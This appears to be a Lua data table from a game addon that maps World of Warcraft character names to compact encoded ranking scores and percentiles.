["Bellzy"] = "ET:641/84%EB:673/86%EM:849/89%",
["Ashief"] = "EB:492/77%EM:758/86%",
["Globo"] = "CB:39/2%UM:262/30%",
["Doraemoon"] = "RT:254/74%EB:592/83%RM:540/62%",
["Okboomkiner"] = "ET:657/94%LB:712/95%EM:844/93%",
["Shaladin"] = "RT:214/66%RB:214/59%EM:677/81%",
["Lejanar"] = "UT:114/39%RB:424/60%UM:387/44%",
["Rootgirl"] = "CT:0/22%CB:97/10%UM:387/46%",
["Deapsham"] = "CB:76/7%RM:521/61%",
["Wistra"] = "RT:173/53%RB:369/52%RM:322/68%",
["Zodded"] = "CT:73/6%UB:236/30%UM:365/39%",
["Dunkodaddy"] = "CB:60/4%EM:622/77%",
["Peppersteak"] = "UB:64/41%EM:632/84%",
["Skend"] = "CB:66/5%RM:564/62%",
["Thadeuz"] = "CB:35/1%EM:841/92%",
["Sofritas"] = "CB:133/14%RM:598/70%",
["Pancakeface"] = "CB:20/14%RM:189/50%",
["Megumegumin"] = "RT:521/66%EB:626/88%RM:591/69%",
["Jackncoke"] = "CB:53/3%UM:74/26%",
["Tasidar"] = "ET:608/92%LB:769/98%LM:920/97%",
["Laando"] = "RB:507/70%RM:540/59%",
["Cbn"] = "UB:155/41%RM:112/60%",
["Wadiwaw"] = "UB:156/41%RM:275/65%",
["Cidalfus"] = "CT:43/3%CB:60/14%CM:128/12%",
["Bobbidi"] = "EB:501/78%RM:298/58%",
["Kilololo"] = "CB:59/11%CM:18/5%",
["Amaryliss"] = "CB:176/20%UM:291/34%",
["Beefús"] = "CT:66/23%UB:196/49%RM:563/66%",
["Artourismad"] = "ET:649/82%RB:336/74%EM:704/80%",
["Derpception"] = "CB:49/3%",
["Tivenlou"] = "ET:605/86%EB:476/81%EM:392/85%",
["Jordy"] = "LT:577/97%EB:683/92%EM:852/93%",
["Shingetta"] = "CT:119/17%RB:399/74%RM:629/73%",
["Kooms"] = "UB:135/33%UM:258/35%",
["Naytiri"] = "CB:27/0%UM:84/29%",
["Shocksftw"] = "CB:6/0%RM:268/61%",
["Putrid"] = "CT:90/8%UM:302/35%",
["Guineapigs"] = "EB:482/78%EM:616/79%",
["Dopefiend"] = "UT:111/35%UB:174/42%UM:434/47%",
["Zehk"] = "RT:175/54%UB:314/43%EM:651/75%",
["Kusuda"] = "CB:89/22%",
["Dunii"] = "UT:62/45%RB:345/63%RM:488/70%",
["Redoneone"] = "CB:165/19%UM:268/31%",
["Cambio"] = "ET:452/87%EB:596/89%EM:655/83%",
["Nay"] = "LT:760/98%LB:771/98%LM:854/98%",
["Harambull"] = "LT:429/95%RB:332/73%EM:812/93%",
["Skeetonyrdad"] = "UB:247/31%",
["Yomet"] = "UM:237/27%",
["Zenna"] = "CB:59/5%UM:320/37%",
["Comeatme"] = "RT:145/52%EB:510/78%EM:625/79%",
["Flourae"] = "RB:500/71%UM:423/49%",
["Tidalsmash"] = "UM:351/41%",
["Bluehole"] = "RB:399/54%EM:693/76%",
["Rikasalins"] = "CB:6/0%",
["Buffnut"] = "RT:184/56%UB:37/33%UM:402/48%",
["Bmamba"] = "EB:569/85%RM:545/74%",
["Cultfamily"] = "CB:62/5%RM:424/71%",
["Ulricvonlich"] = "LB:742/97%SM:979/99%",
["Bellissima"] = "CT:27/1%",
["Waterwoman"] = "CT:51/6%UB:221/28%CM:9/6%",
["Anisamikaila"] = "UT:79/28%RB:257/61%EM:707/80%",
["Teaks"] = "UT:88/27%CB:59/11%RM:230/54%",
["Braden"] = "CB:62/5%",
["Jessicaday"] = "CB:185/22%CM:122/14%",
["Mooch"] = "UB:306/42%EM:522/86%",
["Jayd"] = "UB:139/36%RM:600/67%",
["Goodness"] = "CB:60/4%",
["Shadøwmaster"] = "UT:50/43%UB:112/43%RM:403/64%",
["Xyt"] = "EB:595/82%RM:519/57%",
["Tampabayrays"] = "CB:45/2%",
["Herrmit"] = "CM:27/0%",
["Calimac"] = "CB:73/20%RM:174/51%",
["Mahatma"] = "UT:69/26%EB:635/87%EM:859/91%",
["Uncleda"] = "CB:120/11%",
["Uncutchorizo"] = "CB:82/7%CM:16/0%",
["Bullhoof"] = "CB:84/8%UM:362/42%",
["Nohome"] = "RT:398/52%EB:607/84%EM:758/81%",
["Candlelíght"] = "ET:280/87%EB:648/88%EM:714/77%",
["Skunki"] = "ET:740/94%EB:592/93%EM:857/89%",
["Qinbaobao"] = "ET:688/89%EB:460/84%EM:800/85%",
["Oneoneone"] = "ET:341/90%LB:781/98%LM:961/97%",
["Naasir"] = "LT:745/95%LB:765/96%LM:918/95%",
["Anv"] = "LT:779/98%SB:739/99%EM:880/93%",
["Cestlavie"] = "ET:433/94%EB:716/91%EM:825/88%",
["Kitboga"] = "LT:750/95%RB:358/73%RM:578/62%",
["Korruption"] = "ST:780/99%SB:752/99%SM:939/99%",
["Magiclex"] = "RT:435/57%EB:695/92%EM:721/78%",
["Suhzod"] = "ET:574/78%EB:591/79%RM:685/73%",
["Mfy"] = "ET:308/90%EB:628/86%EM:759/82%",
["Bowdaddy"] = "ET:720/92%EB:748/94%EM:900/92%",
["Xihua"] = "ET:728/93%LB:772/97%EM:889/91%",
["Smâ"] = "ET:575/79%SB:835/99%SM:1025/99%",
["Lücÿ"] = "LT:438/95%EB:727/92%EM:896/93%",
["Tuyi"] = "ET:373/92%EB:650/85%EM:794/85%",
["Bigbigmaster"] = "ET:308/86%LB:747/95%EM:893/92%",
["Satetrainer"] = "LT:756/96%EB:616/94%EM:908/92%",
["Paywall"] = "ET:567/76%EB:690/89%EM:899/93%",
["Sophs"] = "ET:735/94%EB:614/94%EM:920/93%",
["Tofue"] = "ET:628/84%EB:699/89%LM:782/95%",
["Rushbee"] = "ET:695/90%EB:633/83%EM:901/93%",
["Drezas"] = "ET:654/86%EB:666/86%CM:172/22%",
["Imsmol"] = "ET:709/91%LB:650/96%EM:812/86%",
["Lilchillbrah"] = "RT:515/69%EB:526/75%EM:728/84%",
["Hippocrit"] = "LT:761/98%LB:779/98%LM:941/97%",
["Foofighter"] = "RT:179/64%EB:719/90%EM:752/79%",
["Aveeno"] = "ST:764/99%LB:674/98%LM:843/98%",
["Erecura"] = "LT:634/98%LB:695/97%EM:818/85%",
["Yerb"] = "ET:719/92%LB:756/95%EM:835/87%",
["Bridgemaster"] = "ET:353/90%RB:476/63%UM:388/46%",
["Seniormama"] = "UT:236/30%RB:413/54%RM:604/66%",
["Pantherô"] = "ET:727/93%EB:729/92%EM:911/93%",
["Zapsy"] = "LT:789/98%LB:775/97%SM:931/99%",
["Spacexx"] = "ET:698/90%EB:611/85%UM:109/36%",
["Babbu"] = "LT:625/98%SB:796/99%SM:966/99%",
["Traxexx"] = "ET:736/94%LB:659/96%EM:922/94%",
["Papsfear"] = "ET:687/89%EB:582/92%EM:817/85%",
["Mightymarri"] = "UT:120/45%EB:746/94%LM:932/95%",
["Poobadoo"] = "LT:749/95%LB:708/98%EM:740/94%",
["Supersoms"] = "UT:335/44%LB:730/95%EM:866/93%",
["Iitoi"] = "ET:422/94%RB:435/61%UM:389/46%",
["Azoun"] = "ET:612/82%LB:767/96%EM:909/93%",
["Andrexa"] = "ET:618/81%RB:315/67%UM:321/37%",
["Seatime"] = "ET:648/85%EB:670/86%CM:162/20%",
["Ithronel"] = "ET:670/88%EB:676/86%LM:961/97%",
["Verex"] = "ET:651/85%LB:668/96%EM:780/81%",
["Audcad"] = "RT:448/59%RB:385/55%EM:705/77%",
["Goopy"] = "ET:688/89%SB:763/99%EM:916/93%",
["Ubirenurai"] = "ET:702/90%EB:741/94%LM:936/95%",
["Trillium"] = "ET:325/86%EB:748/94%EM:887/91%",
["Jenkem"] = "LT:771/97%LB:751/95%EM:905/94%",
["Juemu"] = "ET:634/88%EB:569/94%EM:866/93%",
["Diostinkö"] = "LT:757/96%LB:625/95%LM:912/95%",
["Ufida"] = "ET:656/86%EB:640/83%EM:803/83%",
["Trimscissors"] = "ET:727/93%EB:741/93%EM:897/92%",
["Jyhnthu"] = "LT:751/96%LB:697/98%LM:907/95%",
["Cynric"] = "ST:675/99%LB:669/96%LM:802/95%",
["Hoop"] = "ET:570/75%EB:668/86%EM:826/85%",
["Pushdozer"] = "RT:452/71%EB:506/77%EM:573/76%",
["Babygoon"] = "ET:710/91%LB:760/96%LM:930/96%",
["Drewp"] = "ST:832/99%SB:835/99%SM:1067/99%",
["Atlan"] = "ST:721/99%LB:654/97%LM:939/98%",
["Zugjob"] = "EB:594/76%RM:648/69%",
["Gromaxe"] = "CT:32/12%EB:590/77%EM:817/85%",
["Smouse"] = "RB:359/73%EM:865/89%",
["Meister"] = "UT:350/49%EB:564/75%RM:650/72%",
["Killabc"] = "RB:582/74%RM:703/74%",
["Keydran"] = "RT:228/74%EB:595/78%RM:392/74%",
["Fineapple"] = "ET:690/89%EB:639/83%UM:157/41%",
["Wrathstuck"] = "UT:262/37%RB:527/70%RM:648/72%",
["Odgar"] = "CT:83/10%EB:633/80%EM:708/75%",
["Aprune"] = "ET:716/92%LB:763/96%EM:919/94%",
["Columbidae"] = "RT:562/74%EB:587/77%RM:625/68%",
["Dachuichui"] = "ET:675/88%EB:554/91%EM:728/79%",
["Ultrafinem"] = "CT:69/24%EB:387/76%EM:755/79%",
["Ëzy"] = "CT:44/14%EB:463/84%RM:566/63%",
["Bonesaws"] = "RT:511/70%LB:766/96%EM:831/86%",
["Myapocalypse"] = "ST:747/99%LB:773/98%LM:897/96%",
["Stronger"] = "LB:742/95%EM:812/92%",
["Pendrawar"] = "EB:754/94%EM:806/84%",
["Keeter"] = "ET:738/94%LB:780/98%LM:966/97%",
["Booligo"] = "LB:761/97%LM:902/96%",
["Ishidauryuu"] = "RT:143/53%LB:726/95%EM:575/91%",
["Achhilless"] = "LT:449/96%EB:568/75%EM:889/91%",
["Darqknite"] = "RT:197/65%EB:726/92%EM:874/90%",
["Boocha"] = "RT:491/68%EB:574/76%EM:865/89%",
["Purpsquirt"] = "ET:733/94%EB:664/85%EM:767/83%",
["Gankedurmom"] = "CT:87/10%RB:560/74%RM:438/50%",
["Krime"] = "RT:189/66%EB:574/75%EM:839/89%",
["Alttab"] = "EB:675/85%EM:698/92%",
["Grognar"] = "EB:493/87%EM:901/92%",
["Sugabryan"] = "RT:193/67%EB:408/79%RM:554/63%",
["Frexy"] = "ET:699/90%LB:772/98%LM:945/97%",
["Laonvren"] = "RT:522/69%EB:651/84%EM:872/90%",
["Litobler"] = "ET:318/85%EB:737/93%RM:698/73%",
["Aleks"] = "RB:541/72%EM:727/77%",
["Frostybrew"] = "LB:723/95%EM:866/90%",
["Axcellent"] = "RT:133/50%EB:695/87%EM:810/84%",
["Cynthalus"] = "UT:247/36%EB:537/90%EM:736/78%",
["Kaylin"] = "LT:473/95%EB:600/76%EM:728/77%",
["Sneakmar"] = "EB:666/84%EM:760/80%",
["Slumpgøds"] = "LT:577/97%LB:739/98%LM:835/97%",
["Kxdog"] = "LT:761/97%SB:818/99%SM:982/99%",
["Griphon"] = "ST:649/99%SB:727/99%LM:931/96%",
["Trixipixi"] = "LT:507/96%EB:625/81%RM:588/63%",
["Haleyy"] = "UT:105/37%CB:108/24%",
["Healbank"] = "CT:35/2%CB:62/4%CM:168/20%",
["Platedoctor"] = "RB:521/72%EM:690/75%",
["Brutock"] = "CT:31/5%RB:250/61%UM:137/41%",
["Rokuu"] = "CB:33/6%CM:48/4%",
["Wilderbeast"] = "UB:55/33%UM:120/41%",
["Darkarcanine"] = "ET:645/90%EB:640/92%EM:431/87%",
["Pyeast"] = "CB:41/2%",
["Lêiyølåñi"] = "ET:737/90%EB:634/89%EM:862/94%",
["Guesky"] = "CB:46/7%UM:186/48%",
["Halor"] = "ET:480/80%EB:487/89%LM:901/95%",
["Katylie"] = "UT:78/28%UB:267/35%RM:613/68%",
["Scarebear"] = "CB:55/13%UM:392/46%",
["Geniusbeast"] = "CT:34/9%RB:268/68%RM:211/70%",
["Sylphia"] = "RT:329/68%EB:484/76%RM:569/63%",
["Athelred"] = "CB:42/2%",
["Iqbal"] = "UB:247/31%RM:608/67%",
["Summertime"] = "CB:70/15%",
["Pmcmlm"] = "RB:316/74%EM:705/84%",
["Sierradenali"] = "CT:79/8%UB:41/33%RM:431/62%",
["Enuoyan"] = "CB:91/24%RM:380/68%",
["Vue"] = "SB:847/99%SM:960/99%",
["Xaphin"] = "ET:330/89%RB:255/55%EM:365/76%",
["Shamanigansx"] = "CT:34/6%UB:144/37%UM:93/32%",
["Defnotshoz"] = "UB:314/41%RM:591/65%",
["Jackkbro"] = "RT:205/59%RB:250/69%EM:616/79%",
["Mullato"] = "RB:299/71%EM:796/90%",
["Anacondra"] = "ET:279/87%EB:509/84%EM:668/88%",
["Francisyeung"] = "ET:368/91%EB:436/85%EM:714/85%",
["Nuckabrad"] = "UB:148/47%RM:227/52%",
["Crafts"] = "RB:130/51%RM:197/54%",
["Donamnond"] = "CB:103/24%RM:243/56%",
["Jondabaptz"] = "UT:71/26%UB:265/33%RM:562/67%",
["Savant"] = "UT:123/39%EB:694/94%LM:964/98%",
["Rotensu"] = "LT:725/95%EB:363/85%EM:567/81%",
["Alesea"] = "CT:72/10%UB:66/44%RM:687/72%",
["Torrmund"] = "ET:416/75%EB:577/84%EM:772/88%",
["Majakï"] = "RB:235/57%EM:315/75%",
["Glorycelle"] = "RT:224/64%RB:340/64%EM:352/75%",
["Malangnafu"] = "ET:657/92%EB:683/92%EM:855/93%",
["Draxx"] = "LT:562/98%EB:425/90%EM:776/91%",
["Phirawp"] = "RB:334/65%EM:830/93%",
["Yssim"] = "ET:612/92%SB:808/99%SM:976/99%",
["Tantenten"] = "LT:470/97%LB:733/96%LM:886/98%",
["Muurok"] = "RT:138/69%EB:560/87%UM:41/25%",
["Mys"] = "ET:434/78%EB:682/92%EM:667/92%",
["Badspec"] = "RT:294/68%EB:645/89%LM:921/96%",
["Booney"] = "LT:451/95%EB:593/78%EM:783/84%",
["Bobofett"] = "ST:722/99%SB:755/99%SM:914/99%",
["Greatbacon"] = "LT:759/96%LB:796/98%SM:993/99%",
["Snipermidout"] = "LT:775/97%EB:708/90%LM:941/97%",
["Snowclear"] = "UT:332/44%RB:351/51%RM:478/57%",
["Coyb"] = "LT:749/95%LB:753/95%EM:857/88%",
["Ezbluee"] = "RT:440/59%RB:478/68%EM:429/83%",
["Erky"] = "ET:287/84%EB:669/84%EM:748/78%",
["Neatin"] = "LT:775/97%EB:740/93%EM:868/90%",
["Carrie"] = "ST:663/99%EB:581/93%LM:933/95%",
["Pantani"] = "RT:462/63%EB:540/94%EM:767/88%",
["Delysidd"] = "ET:666/87%LB:671/97%EM:747/79%",
["Crunchlord"] = "LT:770/97%LB:778/97%SM:1017/99%",
["Voli"] = "ST:665/99%EB:732/93%EM:891/92%",
["Bluesy"] = "ET:587/80%EB:695/89%EM:606/89%",
["Rasbeary"] = "LT:755/98%LB:748/97%LM:880/96%",
["Willsnills"] = "ET:232/75%EB:504/92%EM:615/92%",
["Lonalbenzo"] = "ET:600/80%EB:429/84%EM:867/91%",
["Kronjoe"] = "UT:306/41%EB:569/75%RM:665/73%",
["Emorie"] = "ET:320/87%EB:660/89%EM:722/78%",
["Rukusx"] = "RT:168/60%EB:694/89%EM:798/85%",
["Yetiman"] = "ST:713/99%EB:429/84%LM:750/96%",
["Elkura"] = "ET:671/88%EB:721/91%EM:931/94%",
["Remlezar"] = "LT:774/97%LB:772/97%LM:972/98%",
["Snoopybluper"] = "ET:292/82%EB:597/93%EM:749/80%",
["Fooza"] = "ET:561/75%EB:635/83%EM:862/88%",
["Northwinds"] = "ET:706/91%EB:740/93%EM:880/90%",
["Skaðii"] = "ET:729/93%EB:545/90%LM:924/95%",
["Nv"] = "ET:561/75%EB:616/85%EM:886/90%",
["Rogerover"] = "RT:531/74%EB:649/85%EM:821/85%",
["Shnackaran"] = "ET:721/93%LB:784/98%EM:884/92%",
["Blistex"] = "ET:684/89%LB:762/96%EM:873/89%",
["Doofdoggydog"] = "ST:718/99%LB:699/97%EM:895/92%",
["Reminiscing"] = "ST:755/99%LB:744/98%EM:916/93%",
["Wubanga"] = "LT:571/97%EB:671/86%EM:774/94%",
["Portdog"] = "ET:713/92%EB:721/91%EM:797/83%",
["Shabinaa"] = "LT:406/96%LB:768/98%LM:904/97%",
["Yobita"] = "RT:203/70%LB:751/95%EM:919/94%",
["Infamonster"] = "RT:400/54%LB:762/96%LM:946/96%",
["Bigbass"] = "ET:666/88%EB:724/91%EM:917/93%",
["Heilwolves"] = "UT:368/49%EB:631/86%EM:783/87%",
["Xiaokv"] = "RT:480/65%EB:592/83%EM:778/83%",
["Serin"] = "ET:632/83%EB:543/90%EM:821/85%",
["Avi"] = "ET:706/91%LB:766/96%LM:942/95%",
["Azwraith"] = "ET:404/94%EB:699/88%LM:779/95%",
["Manaless"] = "LT:544/97%EB:515/92%LM:968/97%",
["Help"] = "LT:753/98%LB:658/96%LM:883/95%",
["Mfab"] = "ET:353/91%LB:764/96%LM:942/96%",
["Grimloch"] = "ET:443/94%EB:737/93%LM:944/97%",
["Lolh"] = "UT:280/37%UB:134/38%RM:170/53%",
["Chadmage"] = "LT:581/97%EB:732/93%EM:897/93%",
["Paidz"] = "ET:725/93%LB:737/98%EM:879/90%",
["Noknii"] = "ET:717/94%LB:574/95%LM:931/96%",
["Jarvana"] = "ET:597/86%EB:671/90%EM:620/79%",
["Tukobach"] = "ET:711/93%LB:757/96%LM:918/97%",
["Chasr"] = "ET:630/88%LB:770/97%LM:910/95%",
["Millo"] = "ET:723/94%LB:600/96%EM:652/84%",
["Kildarsgodx"] = "ET:683/89%EB:735/93%EM:718/78%",
["Dirtytokyo"] = "LT:754/96%LB:644/97%LM:906/95%",
["Eviljuice"] = "ET:682/89%EB:679/87%RM:587/61%",
["Kpound"] = "RT:381/52%RB:516/70%EM:897/90%",
["Loopyfish"] = "UT:80/30%EB:567/75%RM:633/70%",
["Kenshinx"] = "RT:200/67%EB:506/88%EM:606/87%",
["Putinman"] = "LT:464/96%EB:590/93%EM:841/87%",
["Marle"] = "CT:51/21%EB:649/83%LM:935/96%",
["Gïm"] = "UT:256/33%LB:784/98%LM:996/98%",
["Sundaytripz"] = "UT:99/39%EB:719/90%EM:847/88%",
["Haleyshine"] = "RB:504/68%EM:792/82%",
["Savagebaddog"] = "ET:703/93%EB:696/92%EM:631/83%",
["Csonka"] = "RT:548/74%EB:745/94%EM:850/90%",
["Saxixi"] = "ET:601/78%EB:720/90%EM:840/86%",
["Dranosh"] = "ST:752/99%LB:720/98%LM:864/97%",
["Ezdie"] = "ET:326/89%EB:622/81%EM:791/85%",
["Nacho"] = "LT:570/97%LB:782/98%EM:912/93%",
["Johnstamoist"] = "ET:263/79%EB:561/91%EM:758/79%",
["Jubnartwitch"] = "LT:501/97%EB:638/81%EM:899/92%",
["Bosram"] = "RT:178/63%EB:606/79%RM:672/72%",
["Tyrände"] = "ET:672/88%LB:771/97%LM:962/97%",
["Porkchopz"] = "RT:473/64%LB:779/97%LM:963/97%",
["Hizo"] = "CT:57/11%EB:624/81%UM:257/26%",
["Scorch"] = "LT:511/96%LB:789/98%LM:987/98%",
["Mnmlst"] = "ST:737/99%LB:771/97%LM:953/97%",
["Goindown"] = "RT:522/71%LB:656/96%EM:575/87%",
["Thiande"] = "LT:601/98%LB:648/96%EM:881/91%",
["Hakati"] = "ET:692/89%LB:710/97%EM:900/94%",
["Gnarle"] = "LT:732/95%LB:765/97%LM:970/98%",
["Pyriex"] = "ET:343/88%LB:689/97%EM:866/90%",
["Ahuramazde"] = "LB:778/97%LM:942/96%",
["Iepp"] = "RB:499/67%CM:199/24%",
["Charleslock"] = "ET:308/85%EB:720/91%LM:945/97%",
["Darkkondrius"] = "RT:489/66%EB:677/87%EM:807/84%",
["Treponema"] = "ET:579/76%EB:644/83%RM:653/71%",
["Vrole"] = "UT:103/41%EB:554/91%RM:268/61%",
["Tach"] = "CT:42/4%EB:591/78%EM:770/82%",
["Marvan"] = "RB:509/69%RM:538/57%",
["Ravenhold"] = "ET:287/84%EB:660/83%EM:871/89%",
["Affogator"] = "EB:717/91%EM:868/89%",
["Woopazs"] = "CT:57/21%RB:314/65%RM:601/71%",
["Capriestuns"] = "RB:175/53%RM:465/65%",
["Creepngdeath"] = "UB:159/47%RM:191/52%",
["Lukane"] = "LT:626/98%LB:753/96%SM:1038/99%",
["Majakî"] = "UB:111/49%RM:288/59%",
["Krispxxy"] = "CB:69/5%RM:344/53%",
["Dunnbar"] = "ET:453/80%LB:748/96%LM:911/96%",
["Cowpurse"] = "LT:743/97%LB:751/97%LM:963/98%",
["Murduc"] = "LT:538/96%EB:732/92%EM:825/85%",
["Lyddia"] = "ET:549/86%EB:707/94%EM:636/91%",
["Prisonbob"] = "ET:642/84%EB:635/83%EM:807/84%",
["Nidie"] = "ET:290/82%EB:713/91%EM:882/91%",
["Linai"] = "ET:325/82%RB:98/51%RM:331/64%",
["Fravy"] = "UT:29/31%EB:463/75%RM:463/65%",
["Malnox"] = "ET:443/94%EB:585/92%EM:904/94%",
["Svengeance"] = "ET:492/82%RB:480/66%EM:812/88%",
["Foulbeast"] = "ET:632/83%EB:627/81%EM:870/91%",
["Doralious"] = "UB:131/49%RM:402/62%",
["Baetu"] = "RT:495/67%EB:661/85%EM:788/84%",
["Tankinblunt"] = "UT:248/35%EB:625/81%RM:324/67%",
["Zrs"] = "UT:298/42%RB:359/73%EM:544/85%",
["Oddishpkm"] = "RT:538/72%EB:708/91%EM:911/94%",
["Donttellmypa"] = "ET:370/90%EB:735/93%EM:897/94%",
["Ztheonz"] = "ET:641/85%EB:665/86%EM:815/84%",
["Yyassassin"] = "ET:581/76%EB:559/91%EM:783/83%",
["Facerøll"] = "ET:604/80%LB:580/95%EM:840/88%",
["Noncovalent"] = "RT:198/68%EB:371/78%RM:261/66%",
["Asirae"] = "ET:679/88%SB:814/99%SM:994/99%",
["Pliny"] = "ET:693/90%EB:739/93%EM:836/86%",
["Dumorne"] = "ET:655/85%LB:713/98%LM:930/96%",
["Stuartsbf"] = "ET:274/82%EB:687/86%EM:908/93%",
["Noirombre"] = "ET:615/81%EB:622/81%EM:803/85%",
["Hypercryo"] = "UT:362/47%EB:692/89%EM:899/93%",
["Porkskinbro"] = "ET:699/90%SB:755/99%LM:957/97%",
["Dakkrause"] = "ET:704/91%LB:692/97%EM:825/85%",
["Esimpure"] = "ET:704/91%LB:727/98%EM:454/79%",
["Lucicilla"] = "UT:366/47%CB:159/21%CM:136/21%",
["Bunghole"] = "UT:308/39%EB:676/87%EM:862/90%",
["Minor"] = "ET:437/94%EB:537/77%EM:887/92%",
["Diaperbaby"] = "ET:390/92%LB:737/96%EM:906/93%",
["Kelisiumw"] = "UT:280/39%EB:729/91%EM:863/89%",
["Bigppmanjoey"] = "ET:612/82%EB:726/92%LM:932/95%",
["Goodjorb"] = "ET:292/84%EB:732/93%EM:902/93%",
["Gnomiee"] = "ET:562/75%EB:577/94%EM:492/84%",
["Antioedipus"] = "LT:481/96%EB:692/92%EM:870/91%",
["Hagarnim"] = "ET:634/84%EB:728/92%EM:755/79%",
["Manafest"] = "ET:569/76%EB:584/82%EM:452/81%",
["Kangkang"] = "ET:629/91%EB:703/94%EM:827/91%",
["Orangedrank"] = "ET:715/92%LB:770/97%LM:933/95%",
["Bernadine"] = "LT:745/95%EB:689/88%EM:856/88%",
["Aesedai"] = "UT:329/42%EB:352/76%UM:80/30%",
["Messia"] = "ET:610/81%EB:590/79%EM:811/85%",
["Lovedeathbot"] = "ET:629/83%LB:649/95%RM:671/72%",
["Superrioter"] = "ET:660/85%EB:538/89%EM:789/82%",
["Clearloves"] = "LT:761/96%LB:592/96%EM:467/85%",
["Drknesderive"] = "ST:660/99%LB:697/98%LM:972/98%",
["Honeyapples"] = "ET:715/92%LB:768/96%LM:792/96%",
["Chillbane"] = "RT:403/53%RB:226/55%EM:634/76%",
["Eztuna"] = "ET:559/75%RB:530/70%EM:907/93%",
["Kaiiro"] = "UT:213/27%UB:230/30%RM:333/74%",
["Dalorie"] = "ET:562/75%RB:503/72%UM:98/33%",
["Brunhilt"] = "RT:461/61%RB:403/58%RM:523/57%",
["Envenomed"] = "LT:596/97%LB:738/98%LM:933/95%",
["Mayafey"] = "ET:726/94%LB:606/96%EM:902/94%",
["Blake"] = "RT:226/73%RB:379/52%UM:109/39%",
["Mistriver"] = "UT:363/47%EB:493/89%EM:782/84%",
["Voxsheep"] = "UT:249/32%UB:241/32%UM:447/48%",
["Thikit"] = "ET:638/89%LB:756/98%EM:734/90%",
["Builtlike"] = "ET:645/85%EB:397/77%EM:725/79%",
["Shwap"] = "UT:240/34%UB:374/47%UM:283/28%",
["Bodhifc"] = "ET:623/88%EB:554/87%EM:681/87%",
["Hypereon"] = "ET:655/90%EB:694/93%EM:636/84%",
["Jrosh"] = "LT:750/96%LB:667/98%LM:791/98%",
["Billymadison"] = "LT:768/98%LB:765/98%SM:975/99%",
["Kongyee"] = "LT:606/98%LB:745/96%EM:524/91%",
["Fortuned"] = "ET:626/94%LB:705/95%LM:895/96%",
["Arcturius"] = "ET:697/90%EB:499/90%EM:493/87%",
["Mildoto"] = "ET:308/84%EB:653/84%RM:598/62%",
["Kagama"] = "EB:574/75%UM:345/39%",
["Codyj"] = "CT:131/16%RB:525/67%EM:927/93%",
["Modrdr"] = "LT:770/97%LB:774/97%LM:962/98%",
["Immediate"] = "LT:767/96%EB:514/88%EM:857/89%",
["Weebwhacker"] = "RB:557/74%EM:847/88%",
["Poonassassin"] = "ET:629/82%EB:477/85%RM:691/74%",
["Daquandaa"] = "LB:757/95%EM:890/92%",
["Snozberri"] = "RB:499/67%EM:880/90%",
["Jazandapus"] = "ET:672/87%EB:711/90%EM:893/93%",
["Zêrc"] = "RT:152/53%EB:565/75%RM:377/70%",
["Moobyul"] = "ET:633/89%EB:695/93%EM:608/94%",
["Sdubs"] = "RT:191/64%EB:661/83%EM:794/82%",
["Fogin"] = "CT:60/11%EB:411/79%RM:565/60%",
["Beautykiller"] = "ET:376/91%EB:668/86%EM:805/85%",
["Protozy"] = "CT:58/19%RB:352/72%EM:875/89%",
["Glassreviens"] = "ET:724/93%EB:737/94%EM:895/93%",
["Chargexecute"] = "LT:496/96%EB:686/87%EM:836/87%",
["Snitches"] = "LT:374/96%LB:747/97%LM:708/96%",
["Snekkreg"] = "EB:725/91%LM:937/95%",
["Numbawon"] = "ET:692/90%LB:752/95%LM:925/96%",
["Toxxiic"] = "ET:352/90%EB:671/85%EM:709/75%",
["Wannister"] = "ET:334/88%LB:769/97%EM:872/89%",
["Hectar"] = "UT:311/40%EB:694/89%LM:945/95%",
["Nyangum"] = "UT:263/37%EB:668/84%RM:532/73%",
["Tarick"] = "ST:684/99%LB:775/97%LM:984/98%",
["Jarek"] = "RT:158/58%RB:517/68%RM:682/73%",
["Gerryrogue"] = "RB:471/63%EM:445/76%",
["Petraporker"] = "ET:680/88%EB:732/92%EM:864/91%",
["Kiingy"] = "SB:802/99%LM:980/98%",
["Vailan"] = "ET:325/88%EB:661/83%EM:565/76%",
["Yeeterbeanz"] = "EB:703/93%EM:913/94%",
["Warbastards"] = "ET:660/86%EB:701/89%EM:830/88%",
["Feralegion"] = "ST:585/99%LB:708/98%SM:974/99%",
["Lyelye"] = "UT:287/41%EB:680/86%RM:545/58%",
["Bosanova"] = "ET:588/78%EB:656/89%EM:867/93%",
["Jealouseboy"] = "EB:662/85%",
["Timx"] = "RT:169/61%EB:615/80%RM:568/64%",
["Originalidea"] = "EB:641/81%EM:739/78%",
["Walsh"] = "UT:211/27%EB:569/92%EM:754/79%",
["Discountstab"] = "RB:483/65%EM:766/81%",
["Pellow"] = "LT:643/98%LB:751/95%EM:927/94%",
["Atomdaikon"] = "LT:459/95%EB:468/84%EM:708/92%",
["Dracontide"] = "ET:326/82%LB:743/96%EM:791/91%",
["Poyson"] = "UT:308/40%RB:536/71%EM:832/87%",
["Exequter"] = "LT:519/96%EB:688/87%EM:913/93%",
["Zeyaila"] = "LT:428/96%LB:717/96%LM:927/98%",
["Midgeyy"] = "UT:37/38%EB:579/84%EM:768/88%",
["Sanugal"] = "RT:404/53%LB:783/98%LM:930/95%",
["Orcpriest"] = "LT:467/96%EB:724/94%LM:964/98%",
["Amoree"] = "ET:663/86%EB:719/91%EM:724/75%",
["Solias"] = "ET:677/92%LB:660/98%EM:815/93%",
["Foodpoison"] = "LT:758/96%EB:604/94%CM:63/8%",
["Windfyooher"] = "RT:158/59%RB:367/65%RM:557/74%",
["Friendlycat"] = "RT:203/71%RB:400/71%EM:688/85%",
["Meesoholy"] = "ET:672/93%LB:739/96%EM:795/90%",
["Breezing"] = "RT:154/56%EB:717/92%LM:922/95%",
["Duquanda"] = "UB:351/47%CM:236/23%",
["Megadots"] = "ET:407/92%EB:554/91%LM:799/96%",
["Xenobiotic"] = "EB:623/81%EM:767/80%",
["Auntjumima"] = "UT:263/34%SB:802/99%SM:1056/99%",
["Rybomaniac"] = "LT:783/98%LB:736/98%LM:941/96%",
["Bettathanu"] = "ET:311/87%EB:382/76%EM:711/75%",
["Vermora"] = "ET:424/94%SB:796/99%SM:1017/99%",
["Chadbo"] = "RT:425/56%RB:431/62%RM:473/59%",
["Verloom"] = "ET:716/92%LB:725/98%EM:717/93%",
["Mofofranco"] = "ET:672/88%LB:725/98%EM:844/88%",
["Bling"] = "RT:438/58%RB:276/65%CM:160/24%",
["Squidjoose"] = "ET:250/78%EB:702/90%EM:875/91%",
["Jackpisario"] = "UT:287/37%EB:581/77%EM:671/79%",
["Caeta"] = "ET:700/90%LB:698/97%LM:791/96%",
["Azlia"] = "ET:309/86%LB:660/96%LM:946/95%",
